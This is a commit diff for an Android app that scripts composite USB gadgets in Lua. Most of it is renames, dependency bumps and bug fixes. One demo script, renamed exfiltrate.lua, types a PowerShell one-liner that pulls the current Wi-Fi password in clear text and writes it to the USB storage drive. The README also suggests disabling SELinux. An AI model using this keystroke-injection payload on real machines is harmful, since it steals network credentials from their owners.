usb: dependency bump and bugfixes

Author: Netdex

README.md

@@ -7,7 +7,7 @@ with arbitrary composite USB devices.
 
 **Root access is required.**
 
-## [Demonstration](https://streamable.com/oeyrik)
+## Demonstration
 
 The best way to explain what this app does is with a code example. The following script
 does the following when interpreted by this app:
@@ -71,6 +71,18 @@ gadgets.
 New demo applications can be added to `assets/scripts`. The API is pretty much self-documenting,
 just look at the existing demos to get a feel for how the API works.
 
+## Troubleshooting
+### "Device Malfunctioned" on Windows 10
+There may be an incompatibility between the supported USB speed between the USB function and USB
+port. For example, if you try to use the HID function on a port that only supports USB SuperSpeed,
+you will get this error. This is common when using certain USB 3.0 hubs. If you plugged into a USB
+hub, try using a port connected to the USB Root Hub. If you plugged into a USB 3.0 port, try using a
+USB 2.0 port.
+
+### "java.io.IOException: Could not write to /dev/hidgX"
+Try setting SELinux to permissive mode by running `setenforce 0` as root.
+
+
 ## Third-party
 - [libsuperuser](https://github.com/Chainfire/libsuperuser)
 - [LuaJ](http://www.luaj.org/luaj/3.0/README.html)

app/build.gradle

@@ -1,11 +1,11 @@
 apply plugin: 'com.android.application'
 
 android {
-    compileSdkVersion 30
+    compileSdk 33
     defaultConfig {
-        applicationId "org.netdex.hidfuzzer"
+        applicationId "org.netdex.androidusbscript"
         minSdkVersion 26
-        targetSdkVersion 30
+        targetSdkVersion 33
         versionCode 100
         versionName '1.0.0'
     }
@@ -24,12 +24,12 @@ android {
 }
 
 dependencies {
-    implementation 'androidx.core:core:1.3.2'
-    implementation 'com.google.android.material:material:1.2.1'
+    implementation 'androidx.core:core:1.8.0'
+    implementation 'com.google.android.material:material:1.6.1'
 
     implementation 'eu.chainfire:libsuperuser:1.1.0.+'
     implementation 'org.luaj:luaj-jse:3.0.1'
-    implementation 'androidx.appcompat:appcompat:1.1.0'
+    implementation 'androidx.appcompat:appcompat:1.5.0'
 }
 repositories {
     mavenCentral()

app/src/main/AndroidManifest.xml

@@ -1,17 +1,17 @@
 <?xml version="1.0" encoding="utf-8"?>
 <manifest xmlns:android="http://schemas.android.com/apk/res/android"
-    package="org.netdex.hidfuzzer">
+    package="org.netdex.androidusbscript">
 
     <uses-permission android:name="android.permission.FOREGROUND_SERVICE" />
 
     <application
-        android:allowBackup="true"
         android:icon="@mipmap/ic_fuzzer"
         android:label="@string/app_name"
-        android:supportsRtl="true"
         android:theme="@style/AppTheme">
 
-        <activity android:name=".MainActivity">
+        <activity
+            android:name="org.netdex.androidusbscript.MainActivity"
+            android:exported="true">
             <intent-filter>
                 <action android:name="android.intent.action.MAIN" />
 
@@ -20,14 +20,14 @@
         </activity>
 
         <activity
-            android:name=".SelectAssetActivity"
+            android:name="org.netdex.androidusbscript.SelectAssetActivity"
+            android:exported="true"
             android:label="@string/title_activity_select_asset"
-            android:parentActivityName=".MainActivity" />
+            android:parentActivityName="org.netdex.androidusbscript.MainActivity" />
 
         <service
-            android:name=".service.LuaUsbService"
-            android:enabled="true"
-            android:exported="true" />
+            android:name="org.netdex.androidusbscript.service.LuaUsbService"
+            android:enabled="true" />
 
     </application>
 

app/src/main/assets/scripts/findandtake.lua renamed to app/src/main/assets/scripts/exfiltrate.lua

@@ -1,10 +1,11 @@
 ---
 --- Copy a file from the system to a mass storage gadget
+--- https://docs.hak5.org/hak5-usb-rubber-ducky/advanced-features/exfiltration
 ---
 usb = luausb.create({ id = 0, type = "keyboard"}, {id = 0, type = "storage" })
 kb = usb.dev[1]
 
-local LABEL = "MY_DRIVE_LABEL" -- label of the drive (as assigned by you)
+local LABEL = "COMPOSITE" -- label of the drive (as assigned by you)
 
 while true do
     print("idle")
@@ -20,9 +21,10 @@ while true do
 
     kb.chord(MOD_LSUPER, KEY_R)
     wait(1000)
-    kb.string("powershell\n")
-    wait(2000)
-    kb.string("$drive = Get-WmiObject -Class Win32_LogicalDisk -Filter \"VolumeName='" .. LABEL .. "'\" | Select -Expand DeviceID\n")
+    kb.string("powershell \"$m=(Get-Volume -FileSystemLabel '" .. LABEL .. "').DriveLetter;"
+              .. "netsh wlan show profile name=(Get-NetConnectionProfile).Name key="
+              .. "clear|?{$_-match'SSID n|Key C'}|%{($_ -split':')[1]}>>$m':\\'$env:"
+              .. "computername'.txt'\"\n")
 
     print("done")
     -- poll until usb unplugged

app/src/main/assets/scripts/mouse.lua

@@ -2,9 +2,14 @@ usb = luausb.create({ type = "mouse", id = 0 })
 
 ms1 = usb.dev[1]
 
-while true do
+-- poll until usb plugged in
+while usb.state() == "not attached" do
+    wait(1000)
+end
+
+while usb.state() == "configured" do
     ms1.click(BTN_LEFT)
     ms1.move(30, 0)
-    ms1.scroll(128)
+    ms1.scroll(127)
     wait(1000)
 end

app/src/main/java/org/netdex/hidfuzzer/LuaAssetAdapter.java renamed to app/src/main/java/org/netdex/androidusbscript/LuaAssetAdapter.java

@@ -1,4 +1,4 @@
-package org.netdex.hidfuzzer;
+package org.netdex.androidusbscript;
 
 import android.view.LayoutInflater;
 import android.view.View;

app/src/main/java/org/netdex/hidfuzzer/MainActivity.java renamed to app/src/main/java/org/netdex/androidusbscript/MainActivity.java

@@ -1,4 +1,4 @@
-package org.netdex.hidfuzzer;
+package org.netdex.androidusbscript;
 
 import android.app.Activity;
 import android.content.Intent;
@@ -7,6 +7,7 @@
 import android.os.Handler;
 import android.os.Looper;
 import android.text.Html;
+import android.util.Log;
 import android.view.Menu;
 import android.view.MenuInflater;
 import android.view.MenuItem;
@@ -21,13 +22,13 @@
 import androidx.appcompat.app.AppCompatActivity;
 import androidx.core.os.HandlerCompat;
 
-import org.netdex.hidfuzzer.gui.ConfirmDialog;
-import org.netdex.hidfuzzer.gui.PromptDialog;
-import org.netdex.hidfuzzer.service.LuaUsbService;
-import org.netdex.hidfuzzer.service.LuaUsbServiceConnection;
-import org.netdex.hidfuzzer.task.AsyncIOBridge;
-import org.netdex.hidfuzzer.task.LuaUsbTask;
-import org.netdex.hidfuzzer.task.LuaUsbTaskFactory;
+import org.netdex.androidusbscript.gui.ConfirmDialog;
+import org.netdex.androidusbscript.gui.PromptDialog;
+import org.netdex.androidusbscript.service.LuaUsbService;
+import org.netdex.androidusbscript.service.LuaUsbServiceConnection;
+import org.netdex.androidusbscript.task.AsyncIOBridge;
+import org.netdex.androidusbscript.task.LuaUsbTask;
+import org.netdex.androidusbscript.task.LuaUsbTaskFactory;
 
 
 public class MainActivity extends AppCompatActivity {
@@ -86,8 +87,7 @@ public void createLuaUsbService(LuaUsbTask task) {
         Intent serviceIntent = new Intent(this, LuaUsbService.class);
         activeServiceConn_ =
                 new LuaUsbServiceConnection(task, () -> {
-                    activeServiceConn_ = null;
-                    handler_.post(() -> btnCancel_.setEnabled(false)); // TODO need to unbind...
+                    handler_.post(this::terminateLuaUsbService);
                 });
         bindService(serviceIntent, activeServiceConn_, BIND_AUTO_CREATE);
         btnCancel_.setEnabled(true);
@@ -97,6 +97,7 @@ public void terminateLuaUsbService() {
         if (activeServiceConn_ != null) {
             btnCancel_.setEnabled(false);
             unbindService(activeServiceConn_); // TODO this can cause ANR
+            activeServiceConn_ = null;
         }
     }
 

app/src/main/java/org/netdex/hidfuzzer/SelectAssetActivity.java renamed to app/src/main/java/org/netdex/androidusbscript/SelectAssetActivity.java

@@ -1,13 +1,9 @@
-package org.netdex.hidfuzzer;
+package org.netdex.androidusbscript;
 
 import android.app.Activity;
 import android.content.Intent;
 import android.os.Bundle;
-import android.view.Menu;
-import android.view.MenuInflater;
-import android.view.MenuItem;
 
-import androidx.annotation.NonNull;
 import androidx.appcompat.app.AppCompatActivity;
 import androidx.recyclerview.widget.DividerItemDecoration;
 import androidx.recyclerview.widget.LinearLayoutManager;

app/src/main/java/org/netdex/hidfuzzer/configfs/UsbGadget.java renamed to app/src/main/java/org/netdex/androidusbscript/configfs/UsbGadget.java

@@ -1,10 +1,10 @@
-package org.netdex.hidfuzzer.configfs;
+package org.netdex.androidusbscript.configfs;
 
 import java.nio.file.Paths;
 import java.util.ArrayList;
 
-import org.netdex.hidfuzzer.configfs.function.UsbGadgetFunction;
-import org.netdex.hidfuzzer.util.Command;
+import org.netdex.androidusbscript.configfs.function.UsbGadgetFunction;
+import org.netdex.androidusbscript.util.Command;
 
 import eu.chainfire.libsuperuser.Shell;
 
@@ -60,6 +60,8 @@ public void create(Shell.Threaded su, Parameters params) throws Shell.ShellDiedE
                 Command.echoToFile(params.idVendor, "idVendor"),
                 Command.echoToFile("239", "bDeviceClass"),
                 Command.echoToFile("0x02", "bDeviceSubClass"),
+                // BUG: Unresolved issue with USB 3.0 ports and hubs
+//                Command.echoToFile("super-speed", "max_speed"),
                 Command.echoToFile("0x01", "bDeviceProtocol"),
 
                 "mkdir strings/0x409",

app/src/main/java/org/netdex/hidfuzzer/configfs/function/UsbGadgetFunction.java renamed to app/src/main/java/org/netdex/androidusbscript/configfs/function/UsbGadgetFunction.java

@@ -1,6 +1,6 @@
-package org.netdex.hidfuzzer.configfs.function;
+package org.netdex.androidusbscript.configfs.function;
 
-import org.netdex.hidfuzzer.util.Command;
+import org.netdex.androidusbscript.util.Command;
 
 import java.nio.file.Paths;